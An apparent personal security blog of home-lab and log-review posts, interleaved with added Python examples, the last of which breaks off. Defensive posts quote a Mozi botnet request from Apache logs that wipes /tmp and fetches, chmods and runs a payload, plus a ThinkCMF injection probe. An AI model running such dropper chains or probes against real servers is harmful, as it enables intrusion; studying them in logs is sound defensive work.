The Blog Pages

rsync'd every darn day.

They were POSTing all along. Rookie mistake.

    A family-friend client tasked me with figuring out why their self-hosted web server was receiving so much traffic while their product statistics, customer feedback, and lack of business leads did not reflect an uptick in traffic. If more people are visiting than normal, then sales SHOULD be up, right? Typically. Unless it is being used for something 'else'. Next step: view the logs!

    As I assumed, the server was being used as a relay for posting screen captures. Malicious or not, the traffic isn't related nor wanted. Guess what IP address shows up in the log for the POST requests FROM his server? Yeah, no bueno!

    Apache is not very secure by default. It needs to be hardened. I simply enabled the rewrite module and appended some rewrite rules to the .htaccess file. Bam!

    sudo a2enmod rewrite            # enable mod_rewrite
    sudo systemctl restart apache2  # restart Apache to load the module

    # .htaccess (mod_rewrite directives here need AllowOverride FileInfo in the matching <Directory> block)
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} POST
    RewriteRule .* - [F,L]          # 403 for EVERY POST under this path, legitimate forms included; add a RewriteCond on %{REQUEST_URI} to scope it to the abused paths

    In addition to the above I did advise 'Mike' that the logs would have to be monitored and rewrite rules modified, semi-continuously, to remove ALL unwanted traffic. "Businesses do not have IT departments only for when poo hits the fan. They are also there so the smell doesn't even reach the office."

  • A. Buford
  • Oct, 18th 2021

What's your problem, do you like even blog... bro

    What happened was..

    To be honest I have been keeping pretty busy with the NCL, work, $ and family. I'm completely happy with that setup.

  • A. Buford
  • Oct, 11th 2021

Crowdstrike Cyber Challenge+


    I completely forgot I have this one coming up. It will be a lunch time type deal. This week is a busy one. Fun fact: My son is learning to code in school and he loves it. Go figure. 🤴

    This weekend is the self imposed electronics cleaning and maintenance window for things-at-home.

  • A. Buford
  • Oct, 2nd 2021

NCL Class is.... just wow.

Hashcatn it

    So far we have had SMEs come in and break down the usage of various applications and methodologies in the field of information security including, but not limited to, Burp, JTR and hashcat. I also learned that I'm not completely crazy. Psychology = penetration testing and JTR is a PITA to compile with Nvidia CUDA support. Post class I was able to capture a couple more CTF flags based on what I learned and/or reinforced in a few hours. #Winning

    Special thank-yous to: Johnny Xmas, Mishaal Khan, and Matt Wagenknecht.

  • A. Buford
  • Oct, 1st 2021

What's crack'n?

    Not much going on but work-work and NCL self-study. I'm still undecided on which cert to attack next. CompTIA, this year alone, has set me back $1,000 that I'm not getting back! It is what it is.

  • A. Buford
  • Sept, 28th 2021 | Home Automation pt.VI

    I'm still adjusting the Lovelace dashboards to what makes the most sense. I'm leaning towards having a dedicated media 'manager' page.

  • A. Buford
  • Sept, 25th 2021 | Home Automation pt.V

    I was finally able to understand enough to install the Community Store and get it all configured. The layout possibilities are now endless. I decided to add a BRG Coinbase wallet card just because. Currently the HA frontend is running a transparent custom theme available in HACS. The YAML coding is fairly straightforward although I did have hiccups with duplicated parameters.

    I finally got to do something that I never did with KVM/QEMU. I resized a vm by +30GB. I never really had a reason to until now. It was extremely easy with virsh.

    virsh domblklist <vm-name> : Get the disk image path for the VM instance

    qemu-img resize /var/lib/libvirt/images/speedyvm/haos_ova-6.2.qcow2 +20G : Resize the image (run this with the VM shut down)

    qemu-img info /var/lib/libvirt/images/speedyvm/haos_ova-6.2.qcow2 : Verify the new virtual size. (fdisk -l against the .qcow2 file reads the container, not the guest's disk; check the partition table from inside the guest, which will require a VM restart.)
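On the verify step: as an added example that is not from the post, here is the field that qemu-img resize actually changes, read straight out of a qcow2 header. It shows why running fdisk -l against the .qcow2 file is not a real check: the guest's partition table sits inside the image's clusters, while the virtual size is a header field. The header bytes below are constructed in memory; point read_virtual_size() at a real image (such as the haos_ova-6.2.qcow2 above) to use it for real.

```python
"""Read the guest-visible size from a qcow2 header (added example, not the blog's code)."""
import struct

QCOW_MAGIC = b"QFI\xfb"  # first four bytes of every qcow2 file


def qcow2_virtual_size(header_bytes):
    """Return (version, virtual_size_in_bytes) from the first 32 bytes of a qcow2 image.

    Header layout, all big-endian: magic u32 @0, version u32 @4,
    backing_file_offset u64 @8, backing_file_size u32 @16,
    cluster_bits u32 @20, size u64 @24 (the guest-visible disk size).
    """
    if len(header_bytes) < 32 or header_bytes[:4] != QCOW_MAGIC:
        raise ValueError("not a qcow2 image (magic mismatch)")
    version, _backing_off, _backing_len, _cluster_bits, size = struct.unpack(
        ">IQIIQ", header_bytes[4:32]
    )
    if version not in (2, 3):
        raise ValueError(f"unexpected qcow2 version {version}")
    return version, size


def expected_size_after_resize(header_bytes, grow_by_bytes):
    """What the size field should read after 'qemu-img resize IMG +N'
    (qemu-img's G is binary, so +20G means 20 GiB)."""
    return qcow2_virtual_size(header_bytes)[1] + grow_by_bytes


def read_virtual_size(path):
    """The same check against a real image file on disk."""
    with open(path, "rb") as fh:
        return qcow2_virtual_size(fh.read(32))


def make_demo_header(size_bytes, version=3, cluster_bits=16):
    """Constructed 32-byte header for the demo; a real image carries more after it."""
    return QCOW_MAGIC + struct.pack(">IQIIQ", version, 0, 0, cluster_bits, size_bytes)


if __name__ == "__main__":
    GiB = 1024 ** 3
    before = make_demo_header(32 * GiB)
    print(qcow2_virtual_size(before))                            # (3, 34359738368)
    print(expected_size_after_resize(before, 20 * GiB) // GiB)   # 52
```

Compare the returned size before and after the resize; if it did not move, the image you grew is not the one the domain is using (virsh domblklist tells you which file that is).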

  • A. Buford
  • Sept, 22nd 2021 | Home Automation pt.IV

    So far so good. I have been able to configure most sensors and output devices with Lovelace cards. The platform is extremely flexible and extensible. It has only been a few days and I am already amazed by the benefits of locally hosted home automation. The light in the kids' room closet is no longer 'left' on and I'm MUCH closer to single pages for related tasks including, but not limited to, system administration.

    NCL Update: I'm not really allowed to post much pre- and post-competition. Any updates regarding the NCL will be intentionally vague.

  • A. Buford
  • Sept, 20th 2021

Just sleep on it

    Have you ever gone to bed with a super-difficult-question in your head?

    Well, I have. Lately I have been waking up with either answers or a brand new way of thought. Is it possible to learn in a person's sleep? It is seriously starting to freak me out. I have said for years, to those close to me, "the further I dig into infosec the more I make connections with psychology". I think this is another case of that.

    The world of information technology is full of alerts, notifications, and patterns. Sometimes our brains cannot process every 'sensor' or 'input' in real time. Our 'memory' [literally] becomes full and artifacts are placed into a 'swap file' that our subconscious is processing 24/7. Our subconscious has the opportunity to process that information when the number of higher-level tasks is lowest. At rest.

    In the morning, having “slept on” their remaining brainteasers, the refreshed participants were able to work through more of them. They were able to solve 31.7% of the puzzles invoked by sounds during sleep — a 55% improvement over the 20.5% of uncued puzzles that they could solve.

    When individuals have brain computation, object orientation, or pattern recognition errors they tend to 'crash' or 'panic' without an appropriate shim [object] or patch [medication].

    Our brain, our computer, isn't much different than an operating system [imo]. Then again, this whole rant could also be a result of a bad sleep pattern. I'm no psychologist.

  • A. Buford
  • Sept, 20th 2021

Sec+ & Net+ Renewal complete! & NCL update.

    Earlier today I renewed BOTH my CompTIA Network+ and Security+ certifications. It was VERY exhausting. I had to re-learn a lot in order to pass. Extremely happy it is done. I won't have to worry about them again until 2024.

    Tonight Mission: Crack these passwords for competition practice.

    fun nights

    9-18-2021 | I woke up to good news!


  • A. Buford
  • Sept, 17th 2021

NCL update.

NCL Fall 2021

    Tonight Mission: I really need to deep dive into Python again with a focus on remembering functions. I'll start with "Learn Python - Full Course for Beginners [Tutorial]" @ I've watched this video almost 4 times over the last 3 years and am always taking away something new.

    Oh yeah.... I took time off, officially for competition, with the hopes of doing better than I ever have in a CTF

    Let's go!

    Make the most of your time by being comfortable where you work and learn. Stay ready!

  • A. Buford
  • Sept, 15th 2021

Microsoft-Linux's secret agent person

    Remember that one time you had to update something you didn't know you installed or asked for? I do. Sony BMG is no longer around though. Microsoft is.

    When customers set up a Linux virtual machine in their cloud (AZURE), the OMI agent is automatically deployed without their knowledge when they enable certain Azure services. Unless a patch is applied, attackers can easily exploit these four vulnerabilities to escalate to root privileges and remotely execute malicious code (for instance, encrypting files for ransom).

    Why is the OMI agent of concern you ask, right?

    ..Thanks to the combination of a simple conditional statement coding mistake and an uninitialized auth struct, any request without an Authorization header has its privileges default to uid=0, gid=0, which is root.

    TL;DR: Easy to gain root locally. Remote takeover possible in some default instances.

    What is important about all this?! A few LARGE cloud service providers automatically install 'secret' agents on VM instances. Customers need to understand that Cloud computing comes with things you don't want OR ask for sometimes.
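The bug class the quote describes, as an added illustration that is not OMI's source code (the Basic-auth check, the user table and the request shape are this example's own assumptions): a credentials struct that starts out zeroed, and a conditional that only fills it in when the header is present, so a request with no Authorization header falls straight through as uid 0. The fail-closed version beside it never has an identity to hand out until the header has been validated.

```python
"""Fail-open vs fail-closed authorization (added illustration, not OMI's code)."""
import base64
from dataclasses import dataclass

# Hypothetical user table for the demo: name -> (password, uid, gid).
# Plaintext comparison is for illustration only.
USERS = {"alice": ("hunter2", 1000, 1000)}


@dataclass
class Creds:
    """Mirrors a C struct that was zero-initialised: uid 0 / gid 0 is root."""
    uid: int = 0
    gid: int = 0
    authenticated: bool = False


def _lookup(header):
    """Return (uid, gid) for a valid 'Basic base64(user:pass)' header, else None."""
    try:
        scheme, token = header.split(" ", 1)
        if scheme != "Basic":
            return None
        user, password = base64.b64decode(token).decode().split(":", 1)
    except ValueError:  # bad split, bad base64 padding or bad UTF-8 all land here
        return None
    rec = USERS.get(user)
    if rec is None or rec[0] != password:
        return None
    return rec[1], rec[2]


def handle_fail_open(headers):
    """Vulnerable pattern: creds start as root and are only overwritten when an
    Authorization header is present. Leave the header out and the request
    proceeds with uid 0 although nothing was ever checked."""
    creds = Creds()
    auth = headers.get("Authorization")
    if auth is not None:  # the conditional that should have rejected a missing header
        found = _lookup(auth)
        if found is None:
            return {"status": 401}
        creds.uid, creds.gid, creds.authenticated = found[0], found[1], True
    return {"status": 200, "uid": creds.uid, "gid": creds.gid}


def handle_fail_closed(headers):
    """Fixed pattern: no identity exists until the header has been validated;
    a missing or invalid header is rejected before anything else happens."""
    auth = headers.get("Authorization")
    found = _lookup(auth) if auth is not None else None
    if found is None:
        return {"status": 401}
    return {"status": 200, "uid": found[0], "gid": found[1]}


def basic_header(user, password):
    """Build the header a legitimate client would send."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


if __name__ == "__main__":
    print("no header, fail-open  :", handle_fail_open({}))    # status 200, uid 0
    print("no header, fail-closed:", handle_fail_closed({}))  # status 401
```

The review question for any handler of this shape is simple: find the code path that reaches the privileged action with the auth struct still holding its initial values.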

  • A. Buford
  • Sept, 15th 2021

All(most) done w/ home automation!

all ziggd up

    I finally was able to get the Zigbee2MQTT firmware correctly flashed on the CC2531 and running on Home Assistant. I had to give up on Domoticz. Too much play. Not much fun. At the moment, at least.

    It feels so great to be able to control my system without the need for the Samsung SmartThings hub and/or a working internet connection. I have approximately 20% of the system connected. Configuration is the hard part. The goal is to integrate network AND home security with presence. This will be 'epic!'..... and save on the electric bill. I hope.

    Now to the next rabbit hole. Learning the serialization language that is YAML to make it all work together more efficiently. It doesn't look too far off from, or any more complicated than, XML and JSON. I use both almost every day for 'paid labor' on the Salesforce platform. Small world.

      - host: IP_ADDRESS_CAMERA_1
        username: YOUR_USERNAME
        password: YOUR_PASSWORD

    Resources | &&

    Unrelated news. Thank you mom for the car help!

    We will never forget. 9/11

  • A. Buford
  • Sept, 11th 2021

NCL Fall 2021

    I am extremely happy to share that I will be participating in the Fall 2021 National Cyber League CTF. It allows for the opportunity to sharpen up on some technical pentesting and vulnerability research skills I have acquired over the years, that I had put on the back burner, while sharing my experiences with a TEAM of like minded individuals.

    I will post progress, when possible, when allowed by competition rules.

  • A. Buford
  • Sept, 8th 2021

Chicago CyberSecurity Summit 2021


    The Chicago Cybersecurity Summit this year was somewhat informative. Many of the items spoken on related to Covid's impact on security. The most notable was how rapid adoption and integration of technologies left many gaps for attackers to try to fill.

    Employees and employers had to get familiar, too late, with virtual private networking, cloud methodologies, and the basic idea of 'remote desktops' to name a few.

    As with most bad news.. attackers jump faster than most involved in the patching processes of small to medium sized businesses. Enterprise networks are no exception though.

    A lot was learned. I will attend again next year. I tell those who inquire. Use PTO to grow yourself mentally, spiritually, and/or physically via learning and have fun while doing so. Spending time with family IS growth.

  • A. Buford
  • Sept, 7th 2021

Home automation via crontab and scripts (pt.iii)

home automations

    My fiancée surprised me by purchasing the debugger. My happiness was quickly replaced by anxiety when I ohmed out the bridge board. Shorted across two pins and a 3rd pin completely open. Sent out for replacement. Update soon.

  • A. Buford
  • Aug 24th-earrrly AM, 2021

More on 'Bolt'... my new work server

Bolt john-the-ripper

    I went ahead and installed John the Ripper on the server using snap. It is a lot easier than I remember. When I first used JTR, some 7+ years ago, it had to be compiled to allow for GPU support.


    Originally, “Cracker Jack” was developed for the sake of cracking Unix /etc/passwd files with the help of a dictionary. Then, John the Ripper came into existence afterward. Moreover, a “Pro” version was developed to include more features than the ordinary version. Especially that it has the capability to include and deal with many more hash types on which encrypted passwords are based in the first place. The Ripper’s commercial version is the most used among penetration testers for cracking passwords. This is essentially because of both its speed and great performance.

    $ sudo snap install john-the-ripper

    I periodically use JTR for infosec research. I was not expecting to return anything special when I benchmarked..

    ..and I didn't. So it appears you still have to build it yourself for GPU support. I'll revisit after Samba configuration is perfected.

    More info @

  • A. Buford
  • Sept 1st, 2021

Finished up 'Bolt' my new work server


    Bolt is pretty much the internals from 'ShadowMoon' + 250GB NVMe + 500GB SSD + alt 800W power supply. I always say, "Don't throw away old tech". Old doesn't mean useless, and chances are good you can de-solder some parts for reuse / inventing.

    .... and that's all folks. I'm tired. The plan is to configure Samba server tomorrow... hopefully.

  • A. Buford
  • Sept 1st, 2021

Shadowmoon has Ryzen

Shadowmoon Ryzen

    Recently my AMD FX Black CPU wasn't cutting it for Plex and other home LAN services. I was finally able to 'upgrade'. The best part is the fact that the liquid cooler from the FX series bolts right up to an AM4 chipset. I researched this build for approximately 1 month in advance.

    After an hour of fidd'lin around I was able to dial in my overclock to maximize the memory speed. For some reason when I build a PC, 7/10 times, a monitor ends up on the floor 'test bench'.

    Room temperatures are noticeably lower considering not much was swapped (CPU, mobo, RAM).

    I'm extremely grateful to be able to continue learning through personal experience. Financially and physically.

    Okay, so I couldn't just let this 8-core CPU and motherboard sit on the shelf. I, for the most part, finished assembling the box. I was able to use the Ryzen AM4 stock cooler from the Ryzen 5 on the FX8. I am going to use this as my 'web dev' env server and VM playground host.

  • A. Buford
  • Sept 1st, 2021

Server air movement meets 3d Printing

3d print fan mount

    It was getting a little hot behind the 4U so I decided to repurpose a couple of 120mm PC fans. The 'mini' Thermaltake fan wasn't cutting it. I 3D printed some modified 120mm fan mounts to take care of the job. Total print time was approximately 4 hours on the Creality Ender 3 Pro. The printer actually sits one shelf above the server AND is controlled via a Pronterface-enabled VM. USB passthrough is enabled with a physical cord for comms. Win-Win.

    The bed leveling system took care of the most frowned upon part, leveling. Temps are way down and hot air is no longer getting trapped between the UPS and rackmount. Sticker safe temperatures

    I like stickers, a lot.

    sticker laptops

    Original Thingiverse thing:

  • A. Buford
  • Aug 31st, 2021

Home automation via crontab and scripts (pt.ii)

home automations usb

    So far it seems like I will be using the CC2531 USB dongle as the Zigbee coordinator after flashing it with the appropriate firmware. I haven't decided whether I will go with the USB debugger route or the GPIO path for programming with a Raspberry Pi W. I want to learn how it is done before buying pre-built stuff.

    As always, support Open-source software by donating to the organizations you back.

  • A. Buford
  • Aug 30th, 2021

Rsyslog meets unused SSD

syslog config

    For a while now I have been wanting to implement a unified/central logging 'center'/server to correlate activities, including attempted access violations, on the SOHO LAN. The time for action was yesterday.

    The process was extremely straightforward. Install: sudo apt-get install rsyslog -y

    Update the server configuration to allow remote client access via UDP and TCP.

    Update the client configuration to send logs. Open the client config: sudo nano /etc/rsyslog.conf. Append to end of file: *.* @@ (a single @ forwards over UDP, @@ over TCP). Make sure to update the IP address to that of the syslog server.

    Restart the rsyslog service on the server, then the client: sudo systemctl restart rsyslog

    Verify the server configuration was accepted and the service is running: systemctl status rsyslog. Green means go 👍
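The server side of the steps above, as an added example standing in for the screenshot (this is not the post's own config; the port and the 192.0.2.10 address are placeholders):

```conf
# /etc/rsyslog.conf (or a file under /etc/rsyslog.d/) on the central server:
# accept remote logs over UDP and TCP on 514, the default syslog port.
module(load="imudp")
input(type="imudp" port="514")
module(load="imtcp")
input(type="imtcp" port="514")

# /etc/rsyslog.conf on each client, appended at the end of the file.
# A single '@' forwards over UDP, '@@' over TCP; 192.0.2.10 is a placeholder
# for the syslog server's address (documentation range, not a real host).
*.* @@192.0.2.10:514
```

Neither input module authenticates senders, so once 514 is open anything on the network can write into your log store; restrict the port at the host firewall to the LAN clients you expect, and treat a sudden new sender as one of the irregularities worth questioning.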


  • A. Buford
  • Aug 28th, 2021 👍

It wasn't us, it was the config I tell you!


    For months, Microsoft’s Power Apps portals exposed personal data tied to 38 million records ranging from COVID-19 vaccination status, Social Security numbers and email addresses. Consumers most affected by what is being called a “platform issue” are those doing business with American Airlines, Ford, the Indiana Department of Health and New York City public schools.

    Go there to read about the exposed data specifically. So, here is where the hairs on my arm stand up... when I was getting certified on the Power Platform I saw a security vuln, by design, with the idea of easily identifiable / traversable urls linking to important datasets AND lists.


    Power Apps Portals lists are created to display data from tables. These tables are stored within Microsoft Dataverse. When a developer enables the OData feed on the “OData Feed” list settings tab, they must also activate the “Enable Table Permissions” option on the “General” list settings tab unless they wish to make the OData feed public. This is due to all lists having table permissions disabled by default. Table permissions by default will in fact prevent anonymous data access, but lists ignore these permissions and any custom table permissions unless the developer activates table permissions for the list.

    TL;DR: If you create a list and enable Open Data (OData) you must also enable table permissions, otherwise the data is public. Because lists act differently.

    Microsoft has since made changes to Power Apps portals such that table permissions are enabled by default. This report documents the steps that led to that change.

    Usually when I set a platform-wide setting I expect all embedded applications to behave accordingly. If the application isn't working as the platform instructs then it is a 'bug' and therefore a vulnerability. Just saying.

  • A. Buford
  • Aug 25th AM, 2021

Growth with Greg PT

    Now Live! Yes. You heard right. / is up and running. I'm not sure if a more healthy relationship could exist between an IT professional who sits down all day and a licensed... certified... personal trainer. That health-to-IT profession balance is important. Mobility is key to health.... and I'll stop there. Visit the website. Get trained! Get healthy! Stay smart!


  • A. Buford
  • Aug 25th AM, 2021

Home automation via crontab and scripts (pt.i)

home automations

    When I last was messing around with the Smartthings hub and automation I pretty much stopped once I verified it was working. Slowly, but surely, I will now begin to migrate the Samsung hub automations over to various scripts running on the raspberry pi, which runs smartthings-cli. Crontabs will handle the daily, non-triggered-routine, type automations. For the sensor activated 'things' I will start to look into how I may utilize Zigbee directly with the Pi.


    That link brought me to Domoticz @ A clean, open-source, all-in-one Zigbee controller interface.

    Installed via one-liner curl -sSL | sudo bash once the pre-reqs, including the broker, are installed:

    sudo apt install -y mosquitto mosquitto-clients

    sudo systemctl enable mosquitto.service

    Note: sometimes the command mosquitto -v prompts a warning message saying “Error: Address already in use“. That warning message means that your Mosquitto Broker is already running, so don’t worry about that.
    home automations

    So far research has led me to this post. I shall continue when time allows and a Zigbee dongle is found. This one seems promising and is preconfigured with Zigbee2MQTT for $22(ish) [].

    As always, support Open-source software by donating to the organizations you back.

  • A. Buford
  • Aug 24th-earrrly AM, 2021

That one UPS I was talking about

battery box

    I upgraded it. I decided to take out the OE 5Ah 12V SLA batteries (2x) and replace them with 35Ah units from Amazon. I had to route the wiring externally to accommodate them. They now sit in a separate battery box. Now my backup UPS is able to last as long as what most mid-size businesses would need. We own 4 in total. Failure is not an option.

    Btw, do you like the Marvel/D.C. 4u server decor?

  • A. Buford
  • Aug 22nd, 2021

Interesting one liner found in Apache logs.

one liner

    GET /shell?cd+/tmp;rm+-rf+*;wget+;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

    Take a guess as to what they were trying to achieve line by line. It helps to understand the level of sophistication of your adversary. Does the attack fit the system of interest? If not, are they possibly just spraying to see what sticks? If so, where can you cut off the attacker's next move?

  • A. Buford
  • Aug 22nd, 2021

I don't have time for _____ certification

    Is not what I said when I was working two jobs (2hr commute), attending a cyber security bootcamp while obtaining my Network+ & Security+ certifications.

  • A. Buford
  • Aug 22nd, 2021

What more do you want PLEX?!

    The home Plex server, ShadowMoon, is too dated. It will need an upgrade. Thinking of a cheap Ryzen build. I'll keep thinking until Christmas

  • A. Buford
  • Aug 21st, 2021

"Hackers steal nearly $100m in Japan crypto heist"

    "We are sorry to announce that #LiquidGlobal warm wallets were compromised, we are moving assets into the cold wallet," -Liquid

    I have always said, and will continue to say, "IF you are not trading your crypto then put it on a wallet -- on a VM -- on an HDD w/ SSD copy -- in a safe". It may seem like a little overkill but the threat landscape is THAT SERIOUS now.

    Liquid has said that it was tracing the movement of the stolen cryptocurrencies and working with other exchanges to freeze and recover the assets.

    They will recover a good amount of it, in some type of joint task force venture, to send a political message to hackers or the hackers will return the stolen ear-marked crypto.

    Oh yea.. put into cryptocurrency, or any 'gamble', only what you can afford to lose 100% of. Take care of responsibilities and health first. "Live within your means." Don't keep up with the Joneses if your last name isn't Jones.

  • A. Buford
  • Aug 20th, 2021


T-Mobile breach

    I was wrong. I admit it. I was wrong

    The breach was only 40 million and not all of them were T-Mobile customers. Some were prospective clients. Better yet, some of the stolen PII belonged to people denied credit with T-Mobile!

    T-Mobile breach

    Our preliminary analysis is that approximately 7.8 million current T-Mobile postpaid customer accounts’ information appears to be contained in the stolen files, as well as just over 40 million records of former or prospective customers who had previously applied for credit with T-Mobile. Importantly, no phone numbers, account numbers, PINs, passwords, or financial information were compromised in any of these files of customers or prospective customers.

    I was wrong again! They didn't offer people free LifeLock

    Immediately offering 2 years of free identity protection services with McAfee’s ID Theft Protection Service.

    It was McAfee ID protection. It does feel a little odd that they still use John's name on new products.

  • A. Buford
  • Aug 18th, 2021

T-Mobile databreach of possibly 100M+ customers

T-Mobile breach

    T-Mobile said in a statement to Motherboard that "We are aware of claims made in an underground forum and have been actively investigating their validity. We do not have any additional information to share at this time."

    The most interesting part of this whole situation is that T-Mobile has breaches OFTEN. Customers are seldom compensated or given a fair opportunity to protect their identity.

    It's almost as if a company could share information with other interested parties via a hack and not be penalized as harshly when compared to intentional data 'sharing'. Security posture post-breach is only monitored internally by any organization. There is no external oversight (in the US). I really wonder what would happen if compromised data was being used by competitor companies for a market advantage. I'm talking embedded in algos, functions, etc. The insurance industry and premiums, for example.

    TLDR[vice]; Information includes dob, address information, license numbers, IMEI info++.

    In T-Mobile's defense....they are a really big company and cannot be expected to protect private information forever. Right? I'm sure "One free year of LifeLock" is coming soon.

  • A. Buford
  • Aug 15th, 2021

Review your logs daily! Because proxies, flooding, ++

proxy abuse

    One of the most important resources for artifacts, when not deleted, are logs. Logs are there for a reason and that reason isn't to take up drive space. I review many logs daily. After a while the brain starts to notice irregularities and trends naturally. The brain, IMO, is strongest when tasked with pattern recognition.

    In the above example each 'section' in itself doesn't really provide a lot of information. Let's review the IP addresses. Aside from them being on the same network, we don't know much about the traffic from the IP alone. However, when the IP addresses are compared to request time we start to see a trend. "Oh wow. Four different addresses tried to access SOMETHING at the same exact time". That is a little odd.

    Let's add the 3rd question of "what resource was attempted to be accessed?".

    "Oh wow. Four different computers tried to access THE SAME resource at the same exact time. A document that doesn't exist."

    A quick Google auto-complete comparison of the keyword "fcked" automatically generated results in line with my initial assessment of the user's goals. Malicious.

    If the resource did exist and the objective of the attacker was resource exhaustion then they may have succeeded if the only defense was rate-limiting. However, they were looking to exploit a different vector.

    TL;DR: check logs for activity frequently and question irregularities.
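Putting this post's correlation (same second, same missing resource, several client IPs) and the per-IP POST review from the 'They were POSTing all along' post into code, as an added example that is not from the blog. It parses Apache combined-format lines; the sample lines are constructed (RFC 5737 documentation addresses, and /upload.php is an assumed relay path, not one named in either post).

```python
"""Apache access-log triage: same-second multi-IP bursts and per-IP POST volume
(added example, not the blog's code; sample log lines below are constructed)."""
import re
from collections import Counter, defaultdict

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return the fields we triage on, or None for a line that is not combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def post_summary(lines, allowed_post_paths):
    """Per client IP: count of POSTs to paths that are NOT legitimate form endpoints.
    Returns {ip: (count, sorted paths)} for offenders only."""
    hits = defaultdict(Counter)
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"].split("?")[0] not in allowed_post_paths:
            hits[rec["ip"]][rec["path"]] += 1
    return {ip: (sum(c.values()), sorted(c)) for ip, c in hits.items()}


def same_second_bursts(lines, min_distinct_ips=3):
    """Group requests by (timestamp to the second, path) and report groups where at
    least min_distinct_ips different clients asked for the same path at once."""
    ips_by_key = defaultdict(set)
    status_by_key = {}
    for rec in filter(None, map(parse_line, lines)):
        key = (rec["time"], rec["path"])
        ips_by_key[key].add(rec["ip"])
        status_by_key[key] = rec["status"]
    return [
        {"time": t, "path": p, "ips": sorted(ips), "status": status_by_key[(t, p)]}
        for (t, p), ips in ips_by_key.items()
        if len(ips) >= min_distinct_ips
    ]


# Constructed sample: one client hammering an assumed relay path, one real form
# submission, and four clients fetching the same non-existent document in one second.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2021:03:14:07 +0000] "POST /upload.php HTTP/1.1" 200 41 "-" "curl/7.68.0"
203.0.113.7 - - [12/Aug/2021:03:14:09 +0000] "POST /upload.php HTTP/1.1" 200 41 "-" "curl/7.68.0"
203.0.113.7 - - [12/Aug/2021:03:14:11 +0000] "POST /upload.php HTTP/1.1" 200 41 "-" "curl/7.68.0"
198.51.100.2 - - [12/Aug/2021:03:15:00 +0000] "POST /contact HTTP/1.1" 302 0 "https://example.com/contact" "Mozilla/5.0"
198.51.100.10 - - [12/Aug/2021:04:00:00 +0000] "GET /fcked.doc HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.11 - - [12/Aug/2021:04:00:00 +0000] "GET /fcked.doc HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.12 - - [12/Aug/2021:04:00:00 +0000] "GET /fcked.doc HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.13 - - [12/Aug/2021:04:00:00 +0000] "GET /fcked.doc HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.2 - - [12/Aug/2021:04:00:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    print(post_summary(SAMPLE_LOG, allowed_post_paths={"/contact"}))
    for burst in same_second_bursts(SAMPLE_LOG):
        print(burst)
```

Run it over the real access.log with the site's actual form endpoints in allowed_post_paths before reaching for a blanket POST block: the offenders list tells you which paths to scope the rewrite rule to, and the burst list is the four-IPs-one-missing-document pattern from this post, with the 404 attached.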

  • A. Buford
  • Aug 12th, 2021

Stop the hack before you see it evolve


    John Oliver had a show regarding OxyContin and how it caused many unfortunate events. Many people fall victim to big pharma just like many people fall victim to simple malicious cyber attack vectors when the intent, of the topic, is positive or proactive. Vectors include the malicious registration of similar web domains for nefarious purposes AND low-hanging-fruit attacks (skid spraying).

    Cybersquatting (also known as domain squatting), according to the United States federal law known as the Anticybersquatting Consumer Protection Act, is registering, trafficking in, or using an Internet domain name with bad faith intent to profit from the goodwill of a trademark belonging to someone else. The cybersquatter then offers to sell the domain to the person or company who owns a trademark contained within the name at an inflated price.{wiki}

    On the show John (we go by first names now) revealed that he/they/them (his people's people) registered the domain name in an effort to provide premier resources for information on the Sackler family and the Purdue Pharma bankruptcy.

    Immediately I saw some possibilities for exploitation.

    Domain registration tips:
    -Buy the singular and plural forms
    -Buy common spelling errors associated with it
    -When possible; buy the .com FIRST
    -Buy any OTHER top level domains
    -Secure DNS

    As a good faith effort and to further information security research best practices we have registered and have acknowledged the registration similarities, via text at the top of the page, while still allowing direct access to the intended website via hyperlinks.

    What have we learned
    -In a single day thousands of visitors have ACCIDENTALLY come across our mirrored content
    -We have reinforced our knowledge that some people don't hear the "s" in a .com address.
    -Script kiddies still exist and love to target WordPress websites

    "GET /?a=fetch&content={php}die(@md5(HelloThinkCMF)){/php}"

    The website does run on WordPress. Fortunately it is up to date. Go webadmin! Our adventure stops here.

    Not. Even the bad actors mess up with their tools and attack the wrong targets.


    "We are not running Wordpress so 404 your way somewhere else."

    Depending on how advanced these requests get we may opt to honeypot traffic.
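Taking the 'line by line' challenge from the Mozi one-liner post together with this post's probe, as an added example that is not the blog's code: it URL-decodes the request target, splits an injected /shell?... chain into its commands and labels each stage, and states what system each probe was written for, so 'does the attack fit the system of interest?' can be answered straight from the log line. The two request lines are the ones quoted in the posts (the wget URL in the first was already elided in the log excerpt and is left that way); the stage labels and classification strings are this example's assumptions.

```python
"""Decode and stage-label scanner probes from access-log request lines
(added example, not the blog's code)."""
from urllib.parse import unquote_plus, urlsplit

# The two request lines quoted in the posts.
MOZI_PROBE = "GET /shell?cd+/tmp;rm+-rf+*;wget+;chmod+777+Mozi.a;/tmp/Mozi.a+jaws"
THINKCMF_PROBE = "GET /?a=fetch&content={php}die(@md5(HelloThinkCMF)){/php}"

# First word of each injected shell command -> what that stage is for
# (this example's reading of the usual dropper pattern).
STAGE_LABELS = {
    "cd": "move to a world-writable directory",
    "rm": "wipe the working directory",
    "wget": "fetch the payload (dropper stage)",
    "curl": "fetch the payload (dropper stage)",
    "chmod": "make the payload executable",
}


def decode_target(target):
    """Undo URL encoding; in this probe '+' stands for a space between arguments."""
    return unquote_plus(target)


def shell_chain(decoded_target):
    """Split the query of an injected '/shell?cmd;cmd;...' request into commands."""
    query = urlsplit(decoded_target).query
    return [cmd.strip() for cmd in query.split(";") if cmd.strip()]


def label_chain(commands):
    """Pair each command with its stage; a path under /tmp run as a command is
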